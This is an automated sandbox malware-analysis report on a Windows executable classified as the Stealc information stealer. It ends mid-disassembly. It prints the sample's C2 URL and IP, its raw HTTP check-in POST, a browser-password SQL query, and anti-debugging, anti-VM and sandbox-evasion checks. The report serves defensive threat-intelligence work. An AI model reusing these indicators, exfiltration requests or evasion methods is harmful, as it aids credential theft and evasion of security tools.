Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1520474
MD5:	219066ac9697d1cdeb536bc4ea74c123
SHA1:	a8f5b34c40766dbf7ae0140c581dc23c5d75918f
SHA256:	ce8350a94bca9e1e552275527845443db7c0d0159e34e53220bfe38fed03e041
Tags:	exeStealcuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 0.2.file.exe.940000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0094C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00949AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00949AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00947240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00947240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00949B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00949B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00958EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00958EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00954910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00954910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0094DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0094E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0094ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00954570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00954570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094F68A FindFirstFileA,	0_2_0094F68A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0094F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00953EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00953EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0094DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0094BE70

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 36 33 33 39 39 32 46 39 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="hwid"AE633992F9F51660493485------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="build"save------KFBAECBAEGDGDHIEHIJJ--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00944880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00944880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 36 33 33 39 39 32 46 39 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="hwid"AE633992F9F51660493485------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="build"save------KFBAECBAEGDGDHIEHIJJ--

Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/I~
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpd
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo?
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/n

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F	0_2_00CD686F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C8007B	0_2_00C8007B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE2980	0_2_00CE2980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0BA07	0_2_00D0BA07
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D083F6	0_2_00D083F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFE3AB	0_2_00CFE3AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D15B68	0_2_00D15B68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB5C61	0_2_00BB5C61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5141F	0_2_00C5141F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0D5C0	0_2_00D0D5C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D035E1	0_2_00D035E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFB5DF	0_2_00BFB5DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2056B	0_2_00C2056B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CBCD12	0_2_00CBCD12
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF3E99	0_2_00BF3E99
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFFEB7	0_2_00CFFEB7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D09E54	0_2_00D09E54
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD2642	0_2_00CD2642
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC77A9	0_2_00BC77A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0EFFD	0_2_00D0EFFD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1270D	0_2_00C1270D

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 009445C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: pypkqjdw ZLIB complexity 0.9947862861570248

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00958680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00958680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00953720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00953720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\6MDZQ8MF.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1828864 > 1048576

Source: file.exe

Static PE information: Raw size of pypkqjdw is bigger than: 0x100000 < 0x198600

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.940000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pypkqjdw:EW;fqpfwnfj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pypkqjdw:EW;fqpfwnfj:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00959860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00959860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1caa0f should be: 0x1cca40

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: pypkqjdw
Source: file.exe	Static PE information: section name: fqpfwnfj
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push 45D11B5Ch; mov dword ptr [esp], ebx	0_2_00CB88F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push 1B3F5D88h; mov dword ptr [esp], edx	0_2_00CB89CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push 17EE9B89h; mov dword ptr [esp], ecx	0_2_00CB89E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push ebp; mov dword ptr [esp], edx	0_2_00CB8A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push 7ACF34A2h; mov dword ptr [esp], ecx	0_2_00CB8A96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push eax; mov dword ptr [esp], ebp	0_2_00CB8AA2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DAC8C4 push 3D0B2B3Ch; mov dword ptr [esp], esp	0_2_00DAC93D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D860FD push 5CEB16B2h; mov dword ptr [esp], ebx	0_2_00D8613D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D860FD push 3919A446h; mov dword ptr [esp], eax	0_2_00D8617F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CAF8FE push ebp; mov dword ptr [esp], edi	0_2_00CAF9AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CAF8FE push ecx; mov dword ptr [esp], E60C94C7h	0_2_00CAF9E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD309C push edi; mov dword ptr [esp], ebp	0_2_00DD30D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD309C push ecx; mov dword ptr [esp], 5FF79B79h	0_2_00DD30E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2D885 push edi; mov dword ptr [esp], esi	0_2_00D2D8A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C38099 push edx; mov dword ptr [esp], 12A2CCC0h	0_2_00C380DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C38099 push 37E74602h; mov dword ptr [esp], eax	0_2_00C3813C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE0085 push ebp; mov dword ptr [esp], ecx	0_2_00DE00AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE0085 push 4785A463h; mov dword ptr [esp], ebp	0_2_00DE00C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D4485E push 5DD3F517h; mov dword ptr [esp], eax	0_2_00D448A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7B859 push ebp; mov dword ptr [esp], ebx	0_2_00D7B896
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6F059 push ebp; mov dword ptr [esp], esi	0_2_00D6F067
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095B035 push ecx; ret	0_2_0095B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D71076 push ebx; mov dword ptr [esp], edx	0_2_00D71098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F push 65287EA0h; mov dword ptr [esp], ebx	0_2_00CD689D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F push 5DEB55EAh; mov dword ptr [esp], edx	0_2_00CD69DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F push edx; mov dword ptr [esp], esi	0_2_00CD6A83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F push ebx; mov dword ptr [esp], ebp	0_2_00CD6ADB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F push edx; mov dword ptr [esp], esp	0_2_00CD6ADF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD304D push ebp; mov dword ptr [esp], 67FEB9D0h	0_2_00FD30CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD304D push edi; mov dword ptr [esp], esi	0_2_00FD310B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD304D push 6A8AA740h; mov dword ptr [esp], ebx	0_2_00FD3148

Source: file.exe

Static PE information: section name: pypkqjdw entropy: 7.954735554227634

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00959860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFDEB7 second address: CFDEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007F0D344F4AB6h 0x0000000c popad 0x0000000d jmp 00007F0D344F4AC3h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFDEDD second address: CFDEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14F67 second address: D14F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0D344F4AB6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14F76 second address: D14FAF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D34B708F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F0D34B708FAh 0x00000012 popad 0x00000013 pushad 0x00000014 jl 00007F0D34B708FEh 0x0000001a jp 00007F0D34B708F6h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F0D34B70901h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D15272 second address: D15278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17D81 second address: D17D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17D85 second address: D17D8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17D8B second address: D17DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D34B70901h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17DA0 second address: D17E5F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0D344F4AC8h 0x0000000e nop 0x0000000f jmp 00007F0D344F4ABCh 0x00000014 mov ecx, dword ptr [ebp+122D286Eh] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F0D344F4AB8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 mov edi, 29F5356Bh 0x0000003b push E3F758FAh 0x00000040 jmp 00007F0D344F4AC5h 0x00000045 add dword ptr [esp], 1C08A786h 0x0000004c push ecx 0x0000004d mov dword ptr [ebp+122D1CE6h], ecx 0x00000053 pop edi 0x00000054 push 00000003h 0x00000056 push edx 0x00000057 